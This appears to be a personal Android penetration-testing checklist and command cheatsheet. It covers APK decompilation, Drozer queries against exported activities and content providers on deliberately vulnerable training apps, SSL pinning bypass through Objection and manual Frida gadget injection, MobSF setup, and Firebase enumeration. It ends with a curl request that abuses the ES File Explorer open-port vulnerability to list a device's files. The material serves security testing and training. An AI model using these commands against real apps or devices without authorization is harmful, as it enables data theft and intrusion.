Android Penetration Testing Basic Checklist

Step 1: Run the APK in an Emulator

• Use Android Studio to set up and run the APK in an emulator. Do not run any unknown apk's on your personal devices. 
• Understand the behavior of the application. 

Step 2: Decompile the APK

1. Use the following command with apktool to decompile the APK:

   apktool.bat -d applicationName.apk
   

2. Explore the contents, such as the AndroidManifest.xml file and the resources directory.

Step 3: Analyze Decompiled Code with JADX

• Open the APK using jadx-gui for easy access to decompiled source code.

Step 4: Review the AndroidManifest.xml File

Focus on the following areas:

1. API Keys: Look for exposed API keys.

2. Content Providers: Check for exported content providers (exported="true").

3. SdkVersion: Analyze the minimum and target SDK versions.

4. Permissions: Ensure no unnecessary permissions are declared.

5. Activities with exported="true":

   • Test whether such activities can be started using the following command:

     am start packageName/.activityName
     

   • Example:

     am start b3nac.injuredandroid/.b25lActivity
     

   • Verify no sensitive data exists in exported activities.

6. Backups: Identify if the app saves backup data during runtime.

7. Debugging: Check for debug flags or settings.

Step 5: Exploit Exported Content Providers

Use Drozer for further analysis:

1. Run the following command to find accessible content providers:

   run app.provider.info -a com.app.name
   

2. Identify content URIs:

   run scanner.provider.finduris -a com.app.name
   

3. Query the content URI to fetch data:

   run app.provider.query content://com.app.name.provider.notesprovider/notes/
   

Step 6: Review Decompiled Source Code

• In jadx-gui, navigate to:
  Source Code → com → ApplicationName → MainActivity.
• Analyze the following:
  • Classes and functions (Example: f.class).
  • Called functions or classes (double-click to follow references).
• Understand the application's logic and functionality.

Step 7: Check for SSL Pinning

1. Configure a proxy (e.g., Burp Suite) on the emulator.
2. Install the Burp certificate on the emulator by downloading it from:

   http://burp
   

3. Start interception in Burp Suite and observe the traffic:
   • If traffic is visible, SSL Pinning is disabled.
   • If no traffic is seen, you’ll need to bypass SSL Pinning.

Step 8: Bypassing SSL Pinning

Method 1: Using Objection

1. Patch the APK:

   objection patchapk --source applicationName.apk
   

2. Install the generated patched.apk on the emulator.
3. Reload the app; a blank screen may appear.
4. Start Objection :

   objection explore
   

5. Disable SSL Pinning:

   android sslpinning disable
   

6. Verify if traffic is now visible in Burp Suite.

Method 2: Manual Patching with Frida

• If the above method fails, refer to `Patching Manually using Frida` below. 

Step 9: Perform Manual Penetration Testing

• Once traffic interception is successful, perform a thorough Web Penetration Test to identify vulnerabilities in the application.

Android Penetration Testing Cheatsheet

Static Analysis 
#Decompile the application
apktool d appication.apk

#Decompile without resources, use when the app is too huge
apktool d application.apk -r 

#Search for strings in all locations
#Even lib directory can contain some useful source code an API key
#Use Strings on .so/ELF files
#smali directory contains the source code - but its not in readable format, need to use dex to jar converter 

Locations to check for Secrets
- resources/res/values/strings.xml, xmls.xml, integers.xml, attrs.xml - find below strings
 - firebase_database_url
 - google_api_key
 - google_app_id
 - google_crash_reporting_api_key
 - google_storage_bucket
 - client_id
 - API
 - password
 - AWS
 - Secret
 - http:// or https://
 - .db or .sqllite or SQL 

or better use jadx-gui from 
https://github.com/skylot/jadx/releases/tag/v1.5.0

ADB Commands
ADB Cheatsheet is here#Port forward a port from the Android device to ADB 
sudo ssh -p 22 -L 5555:127.0.0.1:5555 [email protected]

#Connect to a device over wireless
adb tcpip 9090

#connect to the service
adb connect 127.0.0.1:5555

#list connected devices
adb devices

#get a shell from a selected device
#adb -s device_name shell
adb -s 127.0.0.1:5555 shell

#get a shell
adb shell

#get root privs from a shell
su

#install an apk 
adb -s "25sdfsfb3801745eg" install "C:\Users\bhanu\Downloads\shell.apk"

#Getting screenshots
adb shell screencap <path to save>

#Recording the screen
adb shell screenrecord <path to save>

#Downloading files
adb pull <source file path> <destination file path>

#Uploading files
adb push <source file path> <destination file path>

#Visiting websites
adb shell am start -a android.intent.action.VIEW -d <URL of the website>

#Getting system information
getprop

Commands inside ADB Shell
#List Available packages
pm list packages 

# Find a specific package
pm list packages | grep Name

# Find the path of the package 
pm path full_packageName

pm path b3nac.injuredandroid
package:/data/app/b3nac.injuredandroid-1/base.apk


# Download the apk back into the main host machine 
#exit out of the adb shell 
exit 
adb pull /data/app/b3nac.injuredandroid-1/base.apk injuredAndroid.apk

#incase you have multiple emulators open
adb -s emulator-5556  pull /data/app/b3nac.injuredandroid-1/base.apk injuredAndroid.apk

# you can now open the apk for static analysis 

Setting up Drozer
#Installing drozer on docker 
docker pull withsecurelabs/drozer

#Downlaod the drozer Agent and install it on android
download from https://github.com/WithSecureLabs/drozer-agent/releases/tag/3.0.0

#Drag and drop on emulator or install via adb 
adb install drozer-agent.apk

#on Windows setup port forwarding for emulator
adb forward tcp:31415 tcp:31415

#Get a docker shell
docker run --net host -it --entrypoint sh withsecurelabs/drozer

#inside the container, start drozer
drozer console connect --server host.docker.internal

# Method - II
#Find the IP Address in about
#Connect the Android using IP address 
docker run --net host -it withsecurelabs/drozer console connect --server 10.10.10.10

#Get a shell
docker run --net host -it --entrypoint sh withsecurelabs/drozer
drozer console connect --server <phone IP address>

Drozer Commands
#list all functionality
list

#List packages 
run app.package.list

#Filter for a specific app keyword
run app.package.list -f diva

#Basic info 
run app.package.info -a jakhar.aseem.diva 

#List About activates, broadcast, content providers and services
run app.package.attacksurface jakhar.aseem.diva

#If the App as Exported Activity
#Get Activity info 
run app.activity.info -a jakhar.aseem.diva

#View/Access the exported activity if Permission: null
run app.activity.start --component  jakhar.aseem.diva jakhar.aseem.diva.APICreds2Activity

run app.activity.start --component  app.package app.activy.path

#You can open the exported actvity directly from adb shell
adb shell am start -n jakhar.aseem.diva.APICreds2Activity

#If the app has providers 
#Get info on content providers
run app.provider.info -a jakhar.aseem.diva

#Run Scanner to find provider urls
#Take the content urls which are under "For Sure Accessible Content URIs"
run scanner.provider.finduris -a jakhar.aseem.diva

#Query a provider url
run app.provider.query content://jakhar.aseem.diva.provider.notesprovider/notes/

#Look for Injection vulnerabilities in an app
run scanner.provider.injection -a jakhar.aseem.diva 

#Automatically exploit SLQ Injection - print tables
run scanner.provider.sqltables -a jakhar.aseem.diva

Installing and Setting up Frida & Objection
python -m pip install setuptools
python -m pip install frida-tools
python -m pip install objection

add this path to env PATH - Update as required "C:\Users\name\AppData\Local\Android\Sdk\build-tools\34.0.0"

#patch the apk with objection first, if that doenst work patch it with frida manually 
#A new apk is generated in the same directory with name.objection.apk 
#Drag and drop the new apk into android emulator, Uninstall the original apk and install the new patched apk. 
objection patchapk --source injuredAndroid.apk

Patching Manually using Frida
You can follow this tutorial

#Decompile without resources, use when the app is too huge
apktool d application.apk -r 

#Go to lib directory of the apk and go to appropriate architecture of the emulator
APK_NAME/lib/x86_64/

go to Frida Releases and download the appropriate gadget 
frida-gadget-16.3.3-android-x86_64.so.xz

#Rename the file to libfrida-gadget.so or frida-gadget.so (based on the libraries naming convention) and copy the file into APK_NAME/lib/x86_64/

#Paste the below code into any smali file which you know loads for sure - Example: MainActivity.smali under /APK_NAME/smali/COmpany/APK_NAME/ (Ex: injuredAndroid/smali/b3nac/injuredandroid/) and save it. 

const-string v0, "frida-gadget"
invoke-static {v0}, Ljava/lang/System;->loadLibrary(Ljava/lang/String;)V


#Add the Internet permission to the manifest if it’s not there already, so that Frida gadget can open a socket.
<uses-permission android:name="android.permission.INTERNET" />

#ReBuild the apk 
apktool b injuredAndroid -o inured_patched.apk 
apktool b DirectoryPath -o Output.apk

#Sign the APK
keytool -genkey -v -keystore custom.keystore -alias mykeyaliasname -keyalg RSA -keysize 2048 -validity 10000

jarsigner -sigalg SHA1withRSA -digestalg SHA1 -keystore custom.keystore -storepass password inured_patched.apk mykeyaliasname

jarsigner -verify inured_patched.apk

# Installing zipalign
nano /etc/apt/sources.list
#comment the kali apt source and add the below line
deb http://ftp.de.debian.org/debian buster main
sudo apt update 
sudo apt install zipalign

zipalign 4 inured_patched.apk inured_final.apk

#Drag and drop the final apk into emulator and start the apk
#Start objection to run the apk
objection explore

#Disable ssl pinning 
android sslpinning disable

Dynamic Analysis with MobSF
#for Linux 
download MobSF and run setup.sh then run.sh

#for Windows
Download docker from https://docs.docker.com/desktop/install/windows-install/ 

#Setup MobSF
docker pull opensecurity/mobile-security-framework-mobsf:latest

#Run MobSF
docker run -it --rm -p 8000:8000 opensecurity/mobile-security-framework-mobsf:latest

#or add a new env variable 
Variable name: mobsf
Variable Value: docker run -it --rm -p 8000:8000 opensecurity/mobile-security-framework-mobsf:latest

from now on type on cmd to run mobsf on docker
%mobsf%

#Access the application using creds mobsf/mobsf
http://127.0.0.1:8000/login/

#Add below path to Environmental variables PATH
C:\Users\Bhanu\AppData\Local\Android\Sdk\emulator

Port Scan on Android
as many random ports can be open on Android devices, its always better to scan all the ports using  
https://github.com/RustScan/RustScan/releases 
download the debian package 
dpkg -i filename
rustscan -a 10.10.10.247 
now scan all the open ports with nmap -sC -sV to run default script and for version scan.

AWS Enumeration 
use Cloud Enum tool - available on github

Firebase DB Enum 
- see if you can find a firebase url in the source code, if yes try going to it and see what you can find there 
- dirb it and find any exposed content
- find the DB on the apk 

Use https://github.com/Sambal0x/firebaseEnum 

git clone https://github.com/Sambal0x/firebaseEnum.git
cd firebaseEnum
python -m pip install -r requirements.txt
python3 firebaseEunm.py -k APK_Name

Abusing ES File Explorer Vuln
Exploit can be downloaded from here #or you can use curl to abuse it 
curl --header "Content-Type: application/json" --request POST --data "{\"command\":\"listFiles\"}" http://192.168.0.105:59777